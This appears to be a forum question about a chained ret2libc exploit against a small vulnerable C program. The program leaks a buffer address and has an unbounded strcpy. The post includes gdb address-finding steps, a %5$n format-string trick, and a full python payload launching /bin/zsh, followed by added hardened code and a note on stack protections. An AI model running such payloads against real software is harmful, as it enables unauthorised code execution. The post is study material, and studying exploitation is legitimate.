I am trying to exploit the code below using a chained ret2libc attack. I am trying to execute the function execl('/bin/zsh','/bin/zsh',NULL).
To write NULL into the 3rd argument of execl, I used printf("%5$n").
Code:

    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[]){
        char buf[256];
        printf("%p",buf);        /* leaks the buffer address used to build the payload */
        strcpy(buf, argv[1]);    /* unbounded copy: the overflow this question targets */
        return 0;
    }
For this, I exported 2 ENV variables, like so:
user$ export SHELL='/bin/zsh'
user$ export test1='%5$n'
Then I compiled the program as follows:
user$ gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -fomit-frame-pointer -o vuln program.c
After that I opened the executable in gdb:
user$ gdb -q vuln
gdb> break main
gdb> run test
gdb> STOPPED AT BREAKPOINT
gdb> print PRINTF --> got the address of this function
gdb> print EXECL --> got this address
gdb> print EXIT --> got this address too
To get the addresses of the ENV variables, I ran
gdb> x/500s $esp --> kept pressing ENTER and got the address. I also got the exact address of the string '/bin/zsh' instead of the address of 'SHELL=/bin/zsh' by adding 6. Similarly got the address of '%5$n'.
To get the address of a POP-RET instruction, I ran objdump -D vuln | grep -A20 pop
--> got the address of a pop-ret instruction.
So the input to the program is as follows:
"A" * 256 + printf_address + pop-ret address + '%5$n' address + execl address + exit address + '/bin/zsh' address + '/bin/zsh' address + 3rd argument address.
I calculated the 3rd argument address as base_address_of_buffer (printed by the program) + 256 + 28 (the other 7 4-byte chunks).
But after running this, it goes to execl and gives an error, as shown below.
Here is the input and the output I got:
(gdb) run $(python -c 'print "A"*256+"\xa0\xb8\xe6\xb7"+"\x24\x85\x04\x08"+"\x54\xfe\xff\xbf"+"\x90\xa2\xed\xb7"+"\xf0\x1b\xe5\xb7"+"\x7e\xf5\xff\xbf"+"\x7e\xf5\xff\xbf"+"\x28\xf3\xff\xbf"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/himmat/Desktop/vuln $(python -c 'print "A"*256+"\xa0\xb8\xe6\xb7"+"\x24\x85\x04\x08"+"\x54\xfe\xff\xbf"+"\x90\xa2\xed\xb7"+"\xf0\x1b\xe5\xb7"+"\x7e\xf5\xff\xbf"+"\x7e\xf5\xff\xbf"+"\x28\xf3\xff\xbf"')
Breakpoint 1, main (argc=2, argv=0xbffff284) at chained_ret2libc.c:14
14 {
(gdb) cont
Continuing.
process 3720 is executing new program: /bin/zsh4
Breakpoint 1, 0x08053443 in main ()
(gdb) cont
Continuing.
/bin/zsh: can't open input file:
[Inferior 1 (process 3720) exited with code 0177]
(gdb)
To verify that all the functions are executed and that the 3rd argument is filled with NULL, see the image below. (image: Execution of program)
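For comparison, here is a hardened counterpart to the program in the question. This is added example code, not the poster's code: the two properties the chain above relies on, the unbounded strcpy into a 256-byte stack buffer and the printf that leaks the buffer's address, are replaced by a length check that rejects oversized input and a constant format string. The helper names (copy_bounded, run_hardened, demo_overlong) and the constructed over-long sample input are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256

/* Hypothetical helper (not from the question): copy src into a fixed-size
 * buffer, refusing anything that would not fit together with its terminator.
 * Returns 0 on success, -1 if the input is too long. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size)
        return -1;               /* would overflow: reject rather than truncate silently */
    memcpy(dst, src, len + 1);   /* len + 1 copies the NUL terminator too */
    return 0;
}

/* Mirrors the question's main() without its two weaknesses: no unbounded
 * strcpy, and no printf("%p", buf) handing out the stack address. */
int run_hardened(const char *arg)
{
    char buf[BUF_SIZE];
    if (copy_bounded(buf, sizeof buf, arg) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", sizeof buf - 1);
        return 1;
    }
    /* Constant format string: user data only ever appears as an argument,
     * so a '%n' inside it is printed literally instead of being interpreted. */
    printf("%s\n", buf);
    return 0;
}

/* Constructed sample: 295 'A's, longer than buf can hold. Returns what
 * run_hardened() returns for it (1 = rejected). */
int demo_overlong(void)
{
    char big[BUF_SIZE + 40];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return run_hardened(big);
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    return run_hardened(argv[1]);
}
```

The question's build line also switches off the stack protector and the frame pointer; with gcc's defaults left in place the canary, and on most distributions PIE, would have to be defeated before the saved return address could be redirected at all, which is why these flags matter as much as the source-level fix.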